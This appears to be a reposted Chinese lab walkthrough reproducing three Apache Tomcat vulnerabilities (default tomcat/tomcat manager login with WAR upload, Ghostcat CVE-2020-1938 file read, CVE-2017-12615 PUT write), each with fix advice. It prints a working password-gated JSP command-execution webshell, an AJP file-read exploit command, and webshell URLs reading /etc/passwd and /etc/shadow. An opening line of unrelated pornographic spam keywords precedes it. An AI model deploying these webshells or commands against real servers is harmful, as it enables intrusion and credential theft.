国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Apache Tomcat 漏洞復(fù)現(xiàn)

這篇具有很好參考價(jià)值的文章主要介紹了Apache Tomcat 漏洞復(fù)現(xiàn)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

Apache Tomcat 漏洞復(fù)現(xiàn)

1. Tomcat7 弱密碼和后端 Getshell 漏洞

鏈接地址:Vulhub - Docker-Compose file for vulnerability environment

1.1 漏洞描述

說(shuō)明 內(nèi)容
漏洞編號(hào)
漏洞名稱(chēng) Tomcat7+ Weak Password && Backend Getshell Vulnerability
漏洞評(píng)級(jí) 高危
影響范圍 8.0
漏洞描述 Tomcat 支持通過(guò)后端部署 war 文件,所以我們可以直接將 webshell 放入 Web 目錄下。為了訪問(wèn)后端,需要權(quán)限。
修復(fù)方案 打補(bǔ)丁,上設(shè)備,升級(jí)組件

1.2 漏洞復(fù)現(xiàn)

環(huán)境啟動(dòng)

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

訪問(wèn)頁(yè)面

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

點(diǎn)擊管理控制平臺(tái)

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

用戶(hù)名和密碼都是tomcat

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

進(jìn)入到了tomcat后臺(tái)項(xiàng)目管理控制臺(tái)

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

如果黑客攻擊者拿到這個(gè)控制臺(tái),就會(huì)有很大的風(fēng)險(xiǎn)。甚至可以將大型木馬打包成WAR包進(jìn)行部署。

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

1.3 漏洞利用

1.3.1 jsp小馬

創(chuàng)建一個(gè)jsp木馬

<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

然后將其打包成WAR包

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

然后及將打包好的WAR包進(jìn)行上傳即可。

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

上傳成功

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

訪問(wèn)頁(yè)面

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

上傳的木馬中寫(xiě)了密碼為023再次訪問(wèn),然后使用ls命令來(lái)查看當(dāng)前目錄下有哪些文件。

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

查看權(quán)限

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

env打印環(huán)境變量

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

1.3.2 jsp大馬

Webshell:138shell update · tennc/webshell@6a88226 (github.com)。

利用我們準(zhǔn)備好的大馬,將其打包成war包后進(jìn)行上傳

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

上傳成功

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

訪問(wèn)成功

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

1.4 安全加固

  • 密碼需要有字符類(lèi)型要求和長(zhǎng)度
  • 增加驗(yàn)證碼認(rèn)證或口令認(rèn)證等機(jī)制
  • 文件上傳點(diǎn)增加上傳限制

2. Aapache Tomcat AJP任意文件讀取/包含漏洞

鏈接地址:Vulhub - Docker-Compose file for vulnerability environment

2.1 漏洞描述

說(shuō)明 內(nèi)容
漏洞編號(hào) CVE-2020-1938
漏洞名稱(chēng) Aapache Tomcat AJP Arbitrary File Read / Include Vulnerability
漏洞評(píng)級(jí) 高危
影響范圍 9.0.30
漏洞描述 由于Tomcat AJP協(xié)議中的缺陷,攻擊者可以讀取或包含Tomcat的Webapp目錄中的任何文件。例如,攻擊者可以讀取 Web 應(yīng)用配置文件或源代碼。此外,如果目標(biāo)Web應(yīng)用具有文件上傳功能,攻擊者可以通過(guò)Ghostcat漏洞利用文件包含漏洞在目標(biāo)主機(jī)上執(zhí)行惡意代碼。
修復(fù)方案 打補(bǔ)丁,上設(shè)備,升級(jí)組件

2.1 漏洞復(fù)現(xiàn)

環(huán)境啟動(dòng)

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

2.2 漏洞利用工具

下載漏洞利用工具鏈接:github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi。

使用工具:

python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.188.185 -p 8009 -f WEB-INF/web.xml

文件讀取成功

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

查看讀取的web.xml文件位置

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

發(fā)現(xiàn)和我們之前讀取的文件內(nèi)容一致

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

測(cè)試是否還可以讀取其他的文件

我們可以在WEB-INF目錄中創(chuàng)建一個(gè)wuhu.txt文件并在里面輸入內(nèi)容

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

然后嘗試讀取該文件內(nèi)容

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

最后驗(yàn)證得出,這里讀取文件是有限制的,只能讀取ROOT目錄下的文件

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

2.4 修復(fù)建議

  1. 官方網(wǎng)站下載新版本進(jìn)行升級(jí)。
  2. 直接關(guān)閉 AJP Connector,或?qū)⑵浔O(jiān)聽(tīng)地址改為僅監(jiān)聽(tīng)本機(jī) localhost。
  3. 若需使用 Tomcat AJP 協(xié)議,可根據(jù)使用版本配置協(xié)議屬性設(shè)置認(rèn)證憑證。

3. 通過(guò) PUT 方法的 Tomcat 任意寫(xiě)入文件漏洞

鏈接地址:Vulhub - Docker-Compose file for vulnerability environment。

3.1 漏洞描述

說(shuō)明 內(nèi)容
漏洞編號(hào) CVE-2017-12615
漏洞名稱(chēng) Tomcat Arbitrary Write-file Vulnerability through PUT Method
漏洞評(píng)級(jí) 高危
影響范圍 8.5.19
漏洞描述 當(dāng)存在漏洞的Tomcat運(yùn)行在Windows/Linux主機(jī)上, 且啟用了HTTP PUT請(qǐng)求方法( 例如, 將readonly初始化參數(shù)由默認(rèn)值設(shè)置為false) , 攻擊者將有可能可通過(guò)精心構(gòu)造的攻擊請(qǐng)求數(shù)據(jù)包向服務(wù)器上傳包含任意代碼的JSP的webshell文件,JSP文件中的惡意代碼將能被服務(wù)器執(zhí)行, 導(dǎo)致服務(wù)器上的數(shù)據(jù)泄露或獲取服務(wù)器權(quán)限
修復(fù)方案 打補(bǔ)丁,上設(shè)備,升級(jí)組件

3.2 漏洞復(fù)現(xiàn)

環(huán)境啟動(dòng)

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

訪問(wèn)頁(yè)面

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

漏洞檢測(cè)

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

使用nuclei漏洞檢測(cè)工具

./nuclei -u 192.168.188.185

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

3.3 漏洞利用

瀏覽器路徑訪問(wèn)

http://127.0.0.1/poc.jsp?cmd=cat+%2Fetc%2Fpasswd

%2F表示/。

頁(yè)面顯示出來(lái)etc/passwd文件內(nèi)容。

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

測(cè)試是否可以查看shadow文件

http://127.0.0.1/poc.jsp?cmd=cat+%2Fetc%2Fshadow

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞

測(cè)試是否可以執(zhí)行命令

http://127.0.0.1/poc.jsp?cmd=whoami

Apache Tomcat 漏洞復(fù)現(xiàn),apache,tomcat,網(wǎng)絡(luò)安全,安全,漏洞文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-703405.html

3.4 修復(fù)建議

  1. 禁用 HTTP PUT 方法:為了防止該漏洞的利用,可以在 Tomcat 配置文件中設(shè)置 “readonly” 屬性,禁用 HTTP PUT 方法。例如,在 server.xml 文件中,可以將 Connector 元素中的 allowTrace 屬性設(shè)置為 false,禁用 TRACE 和 PUT 方法。
  2. 過(guò)濾特殊字符:應(yīng)用程序應(yīng)該過(guò)濾掉特殊字符,如 “…/” 或 “%2e%2e%2f”,以防止攻擊者通過(guò)遍歷路徑來(lái)寫(xiě)入惡意文件。可以使用字符過(guò)濾器或正則表達(dá)式,限制輸入數(shù)據(jù)的格式和內(nèi)容。
  3. 路徑驗(yàn)證和權(quán)限控制:應(yīng)用程序應(yīng)該對(duì)上傳文件的路徑進(jìn)行驗(yàn)證,并限制其訪問(wèn)權(quán)限??梢詫⑸蟼魑募4嬖谔囟ǖ哪夸浿?,并確保其他用戶(hù)無(wú)法訪問(wèn)該目錄。此外,還應(yīng)該對(duì)上傳的文件進(jìn)行掃描和檢測(cè),以防止上傳惡意文件。
  4. 及時(shí)更新軟件版本:Tomcat 團(tuán)隊(duì)已經(jīng)意識(shí)到 PUT 方法任意寫(xiě)入文件漏洞,并提供了修復(fù)版本。因此,建議立即更新受影響的 Tomcat 版本,并實(shí)施相應(yīng)的補(bǔ)丁程序。
  5. 啟用安全模式:可以通過(guò)啟用 Tomcat 的安全模式來(lái)減少漏洞利用的機(jī)會(huì)。安全模式可以限制 Tomcat 的訪問(wèn)權(quán)限,并增加對(duì) Web 應(yīng)用程序的監(jiān)控和控制。

到了這里,關(guān)于Apache Tomcat 漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶(hù)投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 服務(wù)攻防-中間件安全&CVE復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx漏洞復(fù)現(xiàn)

    目錄 一、導(dǎo)圖 二、ISS漏洞 中間件介紹 1、短文件 2、文件解析 3、HTTP.SYS 4、cve-2017-7269 三、Nignx漏洞 中間件介紹 1、后綴解析漏洞 2、cve-2013-4547 3、cve-2021-23017 無(wú) EXP 4、cve-2017-7529 意義不大 四、Apache漏洞 中間件介紹 1、漏洞版本簡(jiǎn)介 2、cve-2021-42013 3、cve-2021-41773 4、cve-2017-1571

    2024年02月10日
    瀏覽(21)
  • 【漏洞復(fù)現(xiàn)】Apache_Tomcat_PUT方法任意寫(xiě)文件(CVE-2017-12615)

    【漏洞復(fù)現(xiàn)】Apache_Tomcat_PUT方法任意寫(xiě)文件(CVE-2017-12615)

    感謝互聯(lián)網(wǎng)提供分享知識(shí)與智慧,在法治的社會(huì)里,請(qǐng)遵守有關(guān)法律法規(guī) 說(shuō)明 內(nèi)容 漏洞編號(hào) CVE-2017-12615 漏洞名稱(chēng) Tomcat_PUT方法任意寫(xiě)文件 漏洞評(píng)級(jí) 高危 影響范圍 Tomcat版本:8.5.19 漏洞描述 漏洞本質(zhì)Tomcat配置了可寫(xiě)(readonly=false),導(dǎo)致我們可以往服務(wù)器寫(xiě)文件 修復(fù)方案

    2024年02月05日
    瀏覽(23)
  • 【網(wǎng)絡(luò)安全---漏洞復(fù)現(xiàn)】Tomcat CVE-2020-1938 漏洞復(fù)現(xiàn)和利用過(guò)程(特詳細(xì))

    【網(wǎng)絡(luò)安全---漏洞復(fù)現(xiàn)】Tomcat CVE-2020-1938 漏洞復(fù)現(xiàn)和利用過(guò)程(特詳細(xì))

    分享一個(gè)非常詳細(xì)的網(wǎng)絡(luò)安全筆記,是我學(xué)習(xí)網(wǎng)安過(guò)程中用心寫(xiě)的,可以點(diǎn)開(kāi)以下鏈接獲?。?超詳細(xì)的網(wǎng)絡(luò)安全筆記 Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。該漏洞是由于Tomcat AJP協(xié)議存在缺陷而導(dǎo)致,攻擊者利用該漏洞可通過(guò)構(gòu)造特定參數(shù),讀取服務(wù)器webapp下的

    2024年02月08日
    瀏覽(24)
  • Apache Tomcat 問(wèn)題漏洞

    Apache Tomcat 環(huán)境問(wèn)題漏洞(CVE-2022-42252) Apache Tomcat 信息泄露漏洞(CVE-2023-28708) 建議直接升級(jí)tomcat的小版本,即就是升級(jí)到最新版本 注:跨版本升級(jí)請(qǐng)自行百度 下載地址:https://tomcat.apache.org/download-80.cgi 停止服務(wù) 直接替換原過(guò)期版本的lib和bin文件夾 重新啟動(dòng)服務(wù),即可升級(jí)成功

    2024年02月13日
    瀏覽(22)
  • Apache Tomcat 信息泄露漏洞CVE-2023-28708處理

    Apache Tomcat 信息泄露漏洞CVE-2023-28708處理

    Apache Tomcat軟件是Jakarta Servlet、 Jakarta Server Pages、 Jakarta Expression Language、 Jakarta WebSocket、 Jakarta Annotations和 Jakarta Authentication 規(guī)范的開(kāi)源實(shí)現(xiàn) 。Apache Tomcat實(shí)現(xiàn)了對(duì)Servlet和JavaServer Page(JSP)的支持,并提供了作為Web服務(wù)器的一些特有功能,如Tomcat管理和控制平臺(tái)、安全域管理和

    2024年02月16日
    瀏覽(16)
  • 第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx

    第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx

    文章僅供學(xué)習(xí)交流,一些價(jià)值不高的漏洞沒(méi)復(fù)現(xiàn),日后來(lái)興趣再補(bǔ)坑(大概~) 文章略長(zhǎng),閱讀需耐心~ 視頻鏈接:? 【小迪安全】紅藍(lán)對(duì)抗 | 網(wǎng)絡(luò)攻防 | V2022全棧培訓(xùn)_嗶哩嗶哩_bilibili https://www.bilibili.com/video/BV1pQ4y1s7kH 目錄 一.知識(shí)點(diǎn) 二.章節(jié)內(nèi)容 1、常見(jiàn)中間件的安全測(cè)試 2、

    2024年02月20日
    瀏覽(27)
  • 小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx

    小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx

    IIS現(xiàn)在用的也少了,漏洞也基本沒(méi)啥用 ?沒(méi)有和權(quán)限掛鉤 windows 2003上面的漏洞 配置不當(dāng):該漏洞與 Nginx、php 版本無(wú)關(guān),屬于用戶(hù)配置不當(dāng)造成的解析漏洞。 這個(gè)跟文件上傳類(lèi)似,找到文件上傳點(diǎn),上傳png圖片 找到上傳路徑和nginx版本號(hào) 查看路徑 添加后綴可以用php執(zhí)行png

    2024年02月04日
    瀏覽(26)
  • Apache Tomcat 最新信息泄露漏洞CVE-2023-28708詳情及解決方案,springboot版本的對(duì)應(yīng)的內(nèi)嵌tomcat版本查看,tomcat相關(guān)。

    CVE - CVE-2023-28708 (mitre.org) NVD - CVE-2023-28708 (nist.gov) CVE-2023-28708 site:tomcat.apache.org - Google Search 當(dāng)將 RemoteIpFilter 與通過(guò) HTTP 從反向代理接收的請(qǐng)求一起使用時(shí),包括設(shè)置為 https 的 X-Forwarded-Proto 標(biāo)頭,由 Apache Tomcat 11.0.0-M1 到 11.0.0.-M2、10.1.0-M1 到 10.1.5、9.0.0-M1 到 9.0.71 和 8.5.0 到 8

    2024年02月13日
    瀏覽(32)
  • 以Apache Tomcat CVE-2020-1938任意文件讀取漏洞(Tomghost)為例基于Tryhackme Tomghost Room的一次滲透測(cè)試

    以Apache Tomcat CVE-2020-1938任意文件讀取漏洞(Tomghost)為例基于Tryhackme Tomghost Room的一次滲透測(cè)試

    Tomcat服務(wù)器是一個(gè)免費(fèi)的開(kāi)放源代碼的Web應(yīng)用服務(wù)器,被普遍使用在輕量級(jí)Web應(yīng)用服務(wù)的構(gòu)架中。 Tomcat提供了可以在其中運(yùn)行Java代碼的“純Java” HTTP Web服務(wù)器環(huán)境。 CVE-2020-1938是由長(zhǎng)亭科技安全研究員發(fā)現(xiàn)的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 協(xié)議設(shè)計(jì)上存在缺陷,攻

    2024年02月12日
    瀏覽(23)
  • 漏洞復(fù)現(xiàn) - - -Tomcat弱口令漏洞

    漏洞復(fù)現(xiàn) - - -Tomcat弱口令漏洞

    目錄 一,簡(jiǎn)介 二,Tomcat弱口令 1 tomcat發(fā)現(xiàn) ?2 使用bp抓取登錄包 ?3?Burpsuite爆破 1.將抓到的包發(fā)送到爆破模塊,快捷鍵ctrl+i ?2,選用自定義迭代器 ?3,開(kāi)始爆破 三,?后臺(tái)Getshell ?1,準(zhǔn)備一個(gè)jsp木馬 2,制作一個(gè)war包 ?3,部署war包到Tomcat Web應(yīng)用程序管理者 Tom cat有一個(gè)管理后臺(tái)

    2024年02月08日
    瀏覽(22)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包